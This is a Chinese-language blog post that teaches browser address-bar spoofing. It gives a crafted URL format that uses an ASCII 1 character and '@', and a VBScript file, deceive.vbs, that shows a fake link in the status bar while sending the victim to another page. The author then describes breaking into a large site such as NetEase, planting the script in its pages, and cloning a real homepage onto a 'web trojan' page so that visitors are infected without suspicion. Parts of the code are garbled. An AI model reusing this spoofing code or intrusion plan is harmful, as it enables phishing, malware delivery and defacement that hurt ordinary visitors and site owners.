網頁木馬種植方案一直都存在很大的問題,當然欺騙需要技巧也需要時間,我們現在不需要那麼麻煩的欺騙,本文就是教大家利用最新瀏覽器漏洞實現域名的欺騙.....  

  前言
  域名欺騙有多種實現方法,本文所說的是利用客戶端瀏覽器的漏洞來欺騙用戶。  

  多數瀏覽器都會存在這個漏洞,目前暫時還沒相應的補丁。漏洞是這樣的:  
當用戶通過瀏覽器訪問一個url,如果這個url是經過以下的格式構造的,那麼瀏覽器實際將訪問經過構造的惡意頁面,而用戶瀏覽器的地址欄裡所顯示的將是虛假的url:  
  
url的構造格式為:   
_1][special_char]@[url_2]/" target=_blank>http://[url_1][special_char]@[url_2]  

說明: :  
 
  url_1為用戶所看到的地址,地址中不可以帶"/"   
  special_char為一個特殊的字符,即ascii碼為1的字符  
  url_2為惡意頁面地址

  利用過程

  首先請看這個測試頁面:  

<html>   
<head>   
<title>域名欺騙技術實例</title>  
</head>
<body link="#0000ff" alink="#0000ff" vlink="#0000ff">  
你可以看看這兩個鏈接有什麼區別:<br>
<h1>鏈接1:<script language="vbscript" src="deceive.vbs"></script></h1>  
<h1> 鏈接2:<a href="_blank ?>www.163.com" target="_blank"http://www.163.com/"; target="_blank"http://ww ... ";>www.163.com</a></h1>  
</body>   
</html>  
 
  這個網頁源代碼,其中鏈接1指向了一個vbs腳本,而鏈接2指向的是163站點。如果我們把連接一的vbs腳本改成下列代碼:  

''''''''''''''''''''''''''''''''''''''deceive.vbs'''''''''''''''''''''''''''''''''''''''''''''   
'(以下請根據實際情況自行修改:)
url1="http://www.163.com/"   
url2="http://www.google.com/"   
text="http://www.163.com/"   
url="_blank ?>http://";&url1&chr(1)& ... p;url2&""   
dn="/"
mouseover="onmouseover=""javascript :window.status='_blank ?>http://";&url1&dn&""""   
mouseout="onmouseout=""javascript :window.status=''""" 
click="onclick=""javascript :navigate('"&url&"')"""   
style="style=""cursor:hand"""
tag ="<span "&style&" "&mouseover&" "&mouseout&" "&click&"><font color=""#0000ff""><u>"&text&"</u></font></span>"  
document.write tag   
'說明:  
'url1是用來欺騙用戶的地址.
'url2是實際訪問的地址,可以是網頁木馬、惡意網頁等.   
'text是鏈接的文字.  
'注意:(以上欺騙地址及實際地址不可以加"http://")
'''''''''''''''''''''''''''''''''''''''cuts here''''''''''''''''''''''''''''''''''''''''''''''''
 
  現在大家看到了吧~~當我們點擊這個測試頁面的時候,鏈接1指向的是google.com,而且狀態欄和地址欄裡都顯示"_blankhttp://www.163.com/",鏈接2卻指向163.com。你也許感到不可思議,但這就是域名欺騙漏洞的魅力。  

  我們可以想像,如果以上的測試頁面中的鏈接1指向的不是google.com,而是我們的網頁木馬,那就...... 
 
  不過,一個普通的個人網站沒人會看的,這就需要我們把這種假鏈接添加到別的大網站的頁面之中。假設我們入侵了一個比較大的網站,比如網易(哇~~~~~~這時候一隻菜鳥推著一車磚頭,看著我......)。這時候就可以把它的頁面給改了。  

   比如有一個文字鏈接,我們就可以把代碼中的"<a href="xxxxx.htm">xxxxxx</a>"改為我們自己的代碼:"<script language="vbscript" src="deceive.vbs"></script>"。看到src屬性裡的deceive.vbs了嗎?我們要編輯好這個文件,然後上傳到要修改的 頁面目錄下。  
 
  這樣還不行,我們還要把自己的木馬網頁的界面修改一下。也就是把原來鏈接到的頁面加入到我們自己的木馬網頁,並且 我們的木馬網頁裡的所有鏈接等內容要和原來的頁面一樣,否則就會引起用戶的懷疑。現在,我們把google網站的首頁源代碼全部複製下來,添加到我們的網 頁木馬。把複製下來的代碼中的圖片或者是鏈接的文件都修改完整,比如logo.gif改為_blank> /UpLoadFiles/NewsPhoto/comalogo.gif,否則網頁就和原來的不一樣了(圖片顯示為紅色的×,鏈接也失效),因為用戶打 開的是你的站點,而你的站點中並沒有logo.gif。都修改好後就可以保存文件了。上傳到你的網頁空間裡。
arrow
arrow
    全站熱搜

    wowMiloo 發表在 痞客邦 留言(0) 人氣()